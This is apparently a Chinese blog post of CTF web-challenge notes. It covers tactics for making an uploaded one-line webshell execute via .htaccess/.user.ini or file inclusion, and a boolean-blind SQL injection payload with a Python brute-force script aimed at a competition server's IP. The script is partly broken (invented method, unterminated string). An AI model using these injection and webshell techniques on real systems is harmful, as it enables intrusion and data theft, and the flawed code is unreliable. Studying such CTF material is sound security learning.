【web-ctf】ctf月赛和升级赛

最新推荐文章于 2024-05-18 11:09:56 发布
最新推荐文章于 2024-05-18 11:09:56 发布
阅读量334 收藏
点赞数
分类专栏: web-ctf 文章标签: 前端 数学建模
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dajian1040556534/article/details/127179500
版权

文章目录

2022/10/2 升级赛-web

学到的知识点:

第一题:文件上传漏洞+文件包含漏洞

  1. 传入一个无法解析的一句话木马后,可以尝试

(1)上传.htaccess或.user.ini文件。
(2)还是无法解析的话,可以查找每个页面的源代码,看看有没有文件包含漏洞。
(3)还是无法解析的话,可以尝试查找服务器用的php版本、中间件版本等,看该版本下有没有漏洞。

  1. 上传文件后,可以查看以下网页源代码,有可能会返回文件上传后的位置
  2. 上传文件后,可以尝试访问以下该文件,看传入后的文件中的某些字符是否被过滤或修改,如有修改,则可以尝试传一些其他的一句话木马。

第二题:布尔盲注

  1. locate函数可以用于布尔盲注,局限性,表中只能有一个表项,否则就会返回错误。

payload:id=‘{}’/(select(locate(binary(‘{}’),结果所在列名,{}))from(结果所在表名))/‘1’

第一个和第三个位置,填入盲注的字符的位置;第二个位置填入盲注使用的字符的二进制编码(因为在传入普通字符串的时候,locate函数是大小写不敏感的,所以需要使用binary函数转换为二进制字符串来处理)

  1. strcmp函数可以用于布尔盲注
import requests as req
import pytricks
import string

chars = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz'
# chars = string.ascii_letters + string.digits + "_{}"
ans = 'flag{'
j = 0

for pos in range(1,80):
	for ch in chars:
		t = (ans + ch)
		t = t.ascii_format("char(%d)",",")
		t = f"concat({t})"
		payload=f"""'and(pow(999,bin(strcmp((select(flag)from(flag)),binary({t}))))
		res = req.post('http://124.16.75.162:31012/',params={"id":payload})
		if 'error 1690' in res.text:
			ans += chr(ord(ch)-1)
			break
		if 'hack' in res.text:
			print("hack")
			exit()
		if 'error ' in res.text:
			print(res.text)
			exit()
	print(ans)
  1. 常见的flag所在表名和列名为flag,即select flag from flag

题解

过动猿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【愚公系列】2023年06月 网络安全高级班 096.CTF黑客比CTF靶场介绍和题目案例)
时光隧道
06-05 4344
1、web题目根据网页底部信息,得知这是用XYHCMS做的网站下载此CMS的源码http://www.xyhcms.com/,并进行代码审计(推荐RIPS)通过代码审计发现orderby参数存在SQL注入风险,类型为布尔盲注主机发现,扫描和识别端口服务,找到22、80、3306目录扫描,找到敏感目录,包括数据库和网站后台手工尝试登录数据库后台,修改网站账号密码利用网站账号登录网站后台,上传网站木马(shell)执行网站木马获取低权限shell,判断系统版本寻找提权方法。
从0-1的CTF环境搭建过程
weixin_62257805的博客
08-17 2921
博主已经对CTFd v3.3.1官方源码进行了更换国内镜像源、添加CTFd-Whale子模块、配置frp网络、设置静态文件CDN加速等工作,可前往使用作者修改的版本进行安装部署。使用Xshll连接进行操作(根据个人习惯选择)此次仅记录了搭建成功的大概过程,也是再N次失败后的一次小小复盘,其中有很多过程在不同机器和系统版本中可能出现报错,其解决方法自行百度或科学上网查找。有时间会更新本地虚拟机详细搭建过程。............
Volatility2安装使用以及CTF题目(复现)
Aluxian_的博客
12-05 5058
Volatility是一款开源内存取证框架,能够对导出的内存镜像进行分析,通过获取内核数据结构,使用插件获取内存的详细情况以及系统的运行状态。题目链接:链接: https://pan.baidu.com/s/1s9Ey8G12COT_vI65TwhIKw?pwd=shkd 提取码: shkd Volatility2.6需要python2,pip安装模块也需要2版本,具体命令根据实际情况调整。本次是比题目的复现参考大佬链接自己在做了一遍:https://bnessy.blog.csdn.net/articl
2023年2月国内外CTF时间汇总来了!
网络安全
02-08 4758
2月国内外CTF时间汇总
CTF-web 第十部分 webshell基础与免杀
iamsongyu的博客
11-15 9990
一、什么是webshell (1)webshell简介         webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载...
ctf题secret.php,记一场纯JS——DiceCTF2021 Web题解
weixin_42509398的博客
03-12 730
// remake the `users` tabledb.exec( `DROP TABLE IF EXISTS users;`);db.exec( `CREATE TABLE users(id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT);`);// add an admin user with a random ...
CTF-60 writeup
热门推荐
a370793934的专栏
03-25 1万+
Web Web1 文件包含 打开看到源码 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> eval() 函数存在命令执行漏洞,构造出文件包含会把字符串参数当做代码来执行...
“百度杯”CTF 2017 二月场 include
SPS98
11-05 580
题目说的很明确, 直接告诉说是文件包含漏洞, 看了下分值感觉应该没有什么套路
【和小白一起练习CTF】攻防世界:web基础练习题(1)
xtcc的博客
08-07 3118
robots.txt文档记录了不应该被搜索引擎的漫游器获取的东西 ,它一般放在根目录下,搜索引擎搜索这个网站时,首先访问这个robots.txt,如果它存在,那就按照它上面写的,不允许访问的页面就不访问,如果它不存在,那搜索引擎就可以查阅所有没有口令保护的页面。:打开网页之后,发现有个按钮,但是点击不了,这时按下F12,打开开发者工具,修改网页源代码,去掉disabled,按钮就可以点击了,这时就出现了flag。:这道题目是要我们了解一下网页的备份文件,在了解之后就可以轻松解决这道题目,下面先介绍一下。..
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
2022工业互联网大-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
Web-CTF-帮助描述一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies...
web-ctf-writeups
05-10
web-ctf-writeups web狗爬坑中的学习的writeup整合。 如果有师傅认为侵权,请联系我删除。另欢迎各位师傅投递链接。该repo会不断更新,最近更新日期为:2018/6/26。 N1CTF 大部分题解 777&&777 2&&babysqli Easy&&...
WEB-CTF.xmind
01-12
WEB-CTF.xmind
WEB转Flutter基础学习笔记(内含vue和flutter对比)
小易不止于搬砖的博客
05-17 670
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
vue3.0+antdv的admin管理系统vue-admin-beautiful推荐
独行猫a 的沉淀、积累、总结。天天学习,好好向上...c/c++,嵌入式 linux,Android,HarmonyOS)
05-15 1109
几年前,笔者自学了vue这一优秀的前端框架,但苦于没项目练手,无意间发现了这一优秀的前端集成框架。当时就使用它做了一很有意思的小项目---终端监控云平台,实现了前端和后台的整体功能。整体方案介绍参见博文《》,前端使用vue-admin-beautiful框架,后端使用go-zero微服务框架,几天内就搞出来了一个包含前端和后台的小项目。我的monitor-ui前端运行界面:后续有机会介绍下我这个终端监控云平台小项目的具体实现,挺有意思的。几年前还用到过几个地方的公交客户现场,客户挺喜欢这个功能的。
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
s_sos0的博客
05-14 508
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
解决 SpringBoot 的 Date、LocalDateTime 变成时间戳和数组的问题,创建自定义对象消息转换器
最新发布
shijialeya
05-18 382
解决 SpringBoot 的 Date、LocalDateTime 变成时间戳和数组的问题,创建自定义对象消息转换器进行数据格式化。
ctf web渗透
10-17
好的,我明白了。对于你的问题,我可以提供一些基本的信息和建议。 首先,CTF中的Web渗透是一个非常广泛的主题,涉及到...参加一些CTF或者挑战可以帮助你锻炼自己的技能,并且学习到一些新的技术和工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值